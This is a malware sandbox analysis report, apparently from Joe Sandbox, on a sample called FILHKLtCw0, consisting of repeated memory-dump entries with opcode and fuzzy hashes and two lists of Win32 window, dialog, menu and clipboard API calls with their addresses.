                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 106032171f4be0c34665c2e716af7c47347a98baceed3569bf05aa3b9c863669
                                                                                                              • Instruction ID: 1328060b54b1bdfdffc9f84dde91091f5d25c9f81dfb0642378c77c50e99f5a4
                                                                                                              • Opcode Fuzzy Hash: 106032171f4be0c34665c2e716af7c47347a98baceed3569bf05aa3b9c863669
                                                                                                              • Instruction Fuzzy Hash: BAC1B374E01218CFDB54DFA5C995B9DBBB2BF89300F2081A9D809AB365DB359E85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 265dd8c8a8d47853d9cc1f06e8be0f0f4ba7dca84680ef3a7a43b4f3cffda668
                                                                                                              • Instruction ID: 5a6b8b49cd19a7a20e43c3ff2b525de0feebb95e810ab92e5a89e04ad000b3e4
                                                                                                              • Opcode Fuzzy Hash: 265dd8c8a8d47853d9cc1f06e8be0f0f4ba7dca84680ef3a7a43b4f3cffda668
                                                                                                              • Instruction Fuzzy Hash: 25C1A174E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D809AB365DB359E85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b4cdaa7143d2deb2e6bc5e4b7be4be82b07ddcee56f7680ec8298435e19d32d7
                                                                                                              • Instruction ID: 5f05dafe9ffe761657e8d71a987d69f1c7d4cce98e250c1afed37fcbd8bff3d9
                                                                                                              • Opcode Fuzzy Hash: b4cdaa7143d2deb2e6bc5e4b7be4be82b07ddcee56f7680ec8298435e19d32d7
                                                                                                              • Instruction Fuzzy Hash: 58C1B274E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D819AB365DB349E85CF11
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 226b7ea8bb764b8a99da43d1f133b6b5a0b324b6ae14516024df5b70c5d1cfe1
                                                                                                              • Instruction ID: ea0dfc0c8642a0b52b04af4ea05b93ec115dee104c74c3b1e647267c1e9359b6
                                                                                                              • Opcode Fuzzy Hash: 226b7ea8bb764b8a99da43d1f133b6b5a0b324b6ae14516024df5b70c5d1cfe1
                                                                                                              • Instruction Fuzzy Hash: 7EC1B275E01218CFDB54DFA5C994B9DBBB2BF89304F2081A9D809AB365DB349E85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 722067bc8241e7ec8ed6ebf8eadd183530aeb894a1f97812b858e0c5c88527b6
                                                                                                              • Instruction ID: f4bf81673c58e5f2c6eb2fe8a60a04c7f418a3d52a42066c366f2e97d994f7e2
                                                                                                              • Opcode Fuzzy Hash: 722067bc8241e7ec8ed6ebf8eadd183530aeb894a1f97812b858e0c5c88527b6
                                                                                                              • Instruction Fuzzy Hash: 47C1B274E01218CFDB54DFA5C994B9DBBB2BF89304F2081A9D809AB365DB349E85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8f06ae313a02fc82646a70d733c1187bada0134f1807f062629d5faa9e11565e
                                                                                                              • Instruction ID: 40b1577a0be35b293f18a4bfe4a7029c10283d68686bbe80d91523a83f31e1a1
                                                                                                              • Opcode Fuzzy Hash: 8f06ae313a02fc82646a70d733c1187bada0134f1807f062629d5faa9e11565e
                                                                                                              • Instruction Fuzzy Hash: 1FC1A374E01218CFDB54DFA5C994B9DBBB2BF89300F2080A9D809AB365DB359E85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e48ca0717b1b8056785d24a805c50c65d9f362f70d93014b5b892e7b9f0412aa
                                                                                                              • Instruction ID: 6469f18add3d5280e0cb1b0fa91cf1a5cd9b3fdf0b2bf06fa3a906dcce5b0a9e
                                                                                                              • Opcode Fuzzy Hash: e48ca0717b1b8056785d24a805c50c65d9f362f70d93014b5b892e7b9f0412aa
                                                                                                              • Instruction Fuzzy Hash: D2C1A274E01218CFDB54DFA5C994B9DBBB2BF89304F2080A9D809AB365DB359E85CF11
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4c01140f558403fc95af94b5436e1218644df26051e45849fa34a4ddf119139c
                                                                                                              • Instruction ID: 440469e8e5513093bd6458d330eef4d82faefe24a70caee2f435e4fb138ec23d
                                                                                                              • Opcode Fuzzy Hash: 4c01140f558403fc95af94b5436e1218644df26051e45849fa34a4ddf119139c
                                                                                                              • Instruction Fuzzy Hash: FDC1B374E01218CFDB54DFA5C994B9DBBB2BF89300F6081A9D809AB355DB359E85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 996fbfa8c3d8a832a8cd5be709c5d1baea82b2aaccc1d767e5c51476da85cec7
                                                                                                              • Instruction ID: c9fe360916a1466e15ed694600ba673aa75cf064a4adfc2e01dc08aef64374c2
                                                                                                              • Opcode Fuzzy Hash: 996fbfa8c3d8a832a8cd5be709c5d1baea82b2aaccc1d767e5c51476da85cec7
                                                                                                              • Instruction Fuzzy Hash: B0C1B578E01218CFDB54DFA5C994B9DBBB2BF89300F2080A9D809AB355DB359E85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d1da1df75e535d5fd10d3f269ec6cef42df32b1cfcb63d506bb618156296e750
                                                                                                              • Instruction ID: 9cec502bba79a054ca5d5568ecc898fb9fe099f3aad7710640cf99cf987478e2
                                                                                                              • Opcode Fuzzy Hash: d1da1df75e535d5fd10d3f269ec6cef42df32b1cfcb63d506bb618156296e750
                                                                                                              • Instruction Fuzzy Hash: 6DC1A374E01218CFDB54DFA5C994B9DBBB2BF89304F2080A9D809AB365DB359E85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e4930c87b605f227fa94293d28ddfe134172575b3c05a01d474776c90ba656eb
                                                                                                              • Instruction ID: 3e5f51b742aa2f4432c1d21f3d681ecdf87ecee3aac356880a6941f49371704c
                                                                                                              • Opcode Fuzzy Hash: e4930c87b605f227fa94293d28ddfe134172575b3c05a01d474776c90ba656eb
                                                                                                              • Instruction Fuzzy Hash: B5C1B375E01218CFDB54DFA5C994B9DBBB2BF89304F2080A9D809AB365DB349E85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4555f685c7a9ebecc1530f6537853ed6ad8e387878cd372725abe473bd7ea35e
                                                                                                              • Instruction ID: a6c24b886e1dc982a597473cb81dfb91f2dfc4e3ad02e9de1d9db01912204b49
                                                                                                              • Opcode Fuzzy Hash: 4555f685c7a9ebecc1530f6537853ed6ad8e387878cd372725abe473bd7ea35e
                                                                                                              • Instruction Fuzzy Hash: E3C1A374E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D809AB355DB359E86CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 32343f02ee9b4bdaf2a5d654f915ce88b685a13390931a7ec7add24d1248afe9
                                                                                                              • Instruction ID: 4279eeaebe64d8218a94d834cb5a6dcaebbac28822f2c9956b19398199ac26df
                                                                                                              • Opcode Fuzzy Hash: 32343f02ee9b4bdaf2a5d654f915ce88b685a13390931a7ec7add24d1248afe9
                                                                                                              • Instruction Fuzzy Hash: E1C1A274E01218CFDB54DFA5C994B9DBBB2BF89304F2081A9D809AB365DB359E85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9f084baa1d7c7c4697185ed19f0414385e94121b30ffbf90ffbcbfc779956fa2
                                                                                                              • Instruction ID: 624383681cc079436f41c081f8ed84ab99e89e8664e009dd74a50fe2c6d220a9
                                                                                                              • Opcode Fuzzy Hash: 9f084baa1d7c7c4697185ed19f0414385e94121b30ffbf90ffbcbfc779956fa2
                                                                                                              • Instruction Fuzzy Hash: E5C1A274E01218CFDB54DFA5C994B9DBBB2BF89300F2080A9D819AB365DB359E85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4a579f6ada1072d38cf21fe41250174e9d0f5061acbd2b00cbf5fc48cd9db767
                                                                                                              • Instruction ID: 93fd6a0e86b3efd8eecaa019dbe4f14088a5475ef7e1c7f7c7bde25dee85b336
                                                                                                              • Opcode Fuzzy Hash: 4a579f6ada1072d38cf21fe41250174e9d0f5061acbd2b00cbf5fc48cd9db767
                                                                                                              • Instruction Fuzzy Hash: 21C1A274E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D809AB365DB359E85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b1ce50edaf39e27499df7752bd6b2a105310a162de55a5273737a60c39955e52
                                                                                                              • Instruction ID: f565d530ab51ca56dcf7d6aad0440ab0697b2ab9f3391069c1b536d0a23c5b18
                                                                                                              • Opcode Fuzzy Hash: b1ce50edaf39e27499df7752bd6b2a105310a162de55a5273737a60c39955e52
                                                                                                              • Instruction Fuzzy Hash: 81C1B374E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D809AB365DB359E85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cb36371f9095d9648669c54d326de20dc9db896b425be8fbfc9ba6922aad2729
                                                                                                              • Instruction ID: fdb7c1ebd8d90e30891e7566f98848f0c37f2d044c4b8b65cc8910f70dd5ce3a
                                                                                                              • Opcode Fuzzy Hash: cb36371f9095d9648669c54d326de20dc9db896b425be8fbfc9ba6922aad2729
                                                                                                              • Instruction Fuzzy Hash: E5C1B279E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB365DB359E85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6d325d591a49f2e1f8b1e85584995fca4acf1c12ac1824e51f696421de1f9542
                                                                                                              • Instruction ID: 3d607645eafb66e4657a21a3e9a810ab0225a07b6b8170da4d665617ef20e3ce
                                                                                                              • Opcode Fuzzy Hash: 6d325d591a49f2e1f8b1e85584995fca4acf1c12ac1824e51f696421de1f9542
                                                                                                              • Instruction Fuzzy Hash: 07C1C275E01218CFDB54DFA5C994B9DBBB2BF89304F2080A9D808AB365DB349E85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 36b4ef491fd6aa69ebb1cd3d6274d28043c760843956df876d5be282d7260c42
                                                                                                              • Instruction ID: 0ea7d516b1913c6cccc40607e9ce4e6eee6bac6812d9fa8547b758008f3fc7e2
                                                                                                              • Opcode Fuzzy Hash: 36b4ef491fd6aa69ebb1cd3d6274d28043c760843956df876d5be282d7260c42
                                                                                                              • Instruction Fuzzy Hash: 0BC1B374E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D809AB365DB359E85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310253673.0000000038380000.00000040.00000800.00020000.00000000.sdmp, Offset: 38380000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38380000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3ff24465494a64e51d834b19763b8c25053fac0d131542e5e0dbf76c075a9d97
                                                                                                              • Instruction ID: 6238df2e89ea932d554e80f8cfcffaf83604434291d8b7da81e2937182284fb5
                                                                                                              • Opcode Fuzzy Hash: 3ff24465494a64e51d834b19763b8c25053fac0d131542e5e0dbf76c075a9d97
                                                                                                              • Instruction Fuzzy Hash: E5C1A274E01218CFDB54DFA5C994B9DBBF2BF89300F6081A9D409AB365DB359A86CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310253673.0000000038380000.00000040.00000800.00020000.00000000.sdmp, Offset: 38380000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38380000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f2edf951fe1195c7ffae1b490510a3c7fcd538a977d3752eb267a0f7ad40c6eb
                                                                                                              • Instruction ID: b2157342a0fdebdf8472e000b80a5e1128da776fdc029c880b94ac42cd5c3e56
                                                                                                              • Opcode Fuzzy Hash: f2edf951fe1195c7ffae1b490510a3c7fcd538a977d3752eb267a0f7ad40c6eb
                                                                                                              • Instruction Fuzzy Hash: 6BC1B074E01218CFDB54DFA5C995B9DBBB2BF89300F2080A9D809AB365DB359E85CF11
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310253673.0000000038380000.00000040.00000800.00020000.00000000.sdmp, Offset: 38380000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38380000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 80d9f82be1df20bea4bda2ddf62e78e73402095b5a0dc2f77f9252dc1d414a1e
                                                                                                              • Instruction ID: a637693d169c62d5259775df37b7f6f5e0725aa910bab3ddcf158c840e1703cc
                                                                                                              • Opcode Fuzzy Hash: 80d9f82be1df20bea4bda2ddf62e78e73402095b5a0dc2f77f9252dc1d414a1e
                                                                                                              • Instruction Fuzzy Hash: E9C1A074E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D809BB365DB359A85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310253673.0000000038380000.00000040.00000800.00020000.00000000.sdmp, Offset: 38380000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38380000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 44ee9bad6c6ce89063229c269ec8912ae37ab02795d948c13f7403ad77dfb234
                                                                                                              • Instruction ID: d93d82c262fae851d51603e1b9ef6129a9f2c0db15be6fafa581f2ec376013df
                                                                                                              • Opcode Fuzzy Hash: 44ee9bad6c6ce89063229c269ec8912ae37ab02795d948c13f7403ad77dfb234
                                                                                                              • Instruction Fuzzy Hash: C8C1A074E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D809AB365DB359E85CF11
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310253673.0000000038380000.00000040.00000800.00020000.00000000.sdmp, Offset: 38380000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38380000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0b26b36b65c3bd65cb4050fc4770ebbb254e622af35db5159b3b186e5d4809d3
                                                                                                              • Instruction ID: bf27a8e1f1d8ece4052969cf5999ce70fc0763f13748b49f04f4d30c94a11258
                                                                                                              • Opcode Fuzzy Hash: 0b26b36b65c3bd65cb4050fc4770ebbb254e622af35db5159b3b186e5d4809d3
                                                                                                              • Instruction Fuzzy Hash: F4C19F74E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D809AB365DB359E85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6598ef2fbb971e3f209331243cba89847c8606fb7e815cee0dbb4cd2d274e7e3
                                                                                                              • Instruction ID: e62e7c8dffbbac60e6870811cddbe674c39da66b42c2c4236016fdb3c34ac063
                                                                                                              • Opcode Fuzzy Hash: 6598ef2fbb971e3f209331243cba89847c8606fb7e815cee0dbb4cd2d274e7e3
                                                                                                              • Instruction Fuzzy Hash: C9D09E79D5422C9ACB11DF64D8506ECB770FF99340F0024E5C14CA7210D7749E99DA56
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 00405351
                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00405360
                                                                                                              • GetClientRect.USER32(?,?), ref: 0040539D
                                                                                                              • GetSystemMetrics.USER32(00000002), ref: 004053A4
                                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
                                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405440
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405461
                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040536F
                                                                                                                • Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004054B3
                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004054C8
                                                                                                              • ShowWindow.USER32(00000000), ref: 004054EC
                                                                                                              • ShowWindow.USER32(?,00000008), ref: 004054F1
                                                                                                              • ShowWindow.USER32(00000008), ref: 0040553B
                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
                                                                                                              • CreatePopupMenu.USER32 ref: 00405580
                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
                                                                                                              • GetWindowRect.USER32(?,?), ref: 004055B4
                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
                                                                                                              • OpenClipboard.USER32(00000000), ref: 00405615
                                                                                                              • EmptyClipboard.USER32 ref: 0040561B
                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00405631
                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405665
                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405670
                                                                                                              • CloseClipboard.USER32 ref: 00405676
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                              • String ID: {
                                                                                                              • API String ID: 590372296-366298937
                                                                                                              • Opcode ID: c03f886d1af96994fdbb0a23cef68d0ed2242977acd76286432e3196303c0609
                                                                                                              • Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
                                                                                                              • Opcode Fuzzy Hash: c03f886d1af96994fdbb0a23cef68d0ed2242977acd76286432e3196303c0609
                                                                                                              • Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58
                                                                                                              APIs
                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
                                                                                                              • ShowWindow.USER32(?), ref: 00403C9A
                                                                                                              • DestroyWindow.USER32 ref: 00403CAE
                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403CEB
                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403D06
                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403DB4
                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403DBE
                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
                                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00403ECF
                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00403EF0
                                                                                                              • EnableWindow.USER32(?,?), ref: 00403F02
                                                                                                              • EnableWindow.USER32(?,?), ref: 00403F1D
                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
                                                                                                              • EnableMenuItem.USER32(00000000), ref: 00403F3A
                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F52
                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
                                                                                                              • lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
                                                                                                              • SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 004040D6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
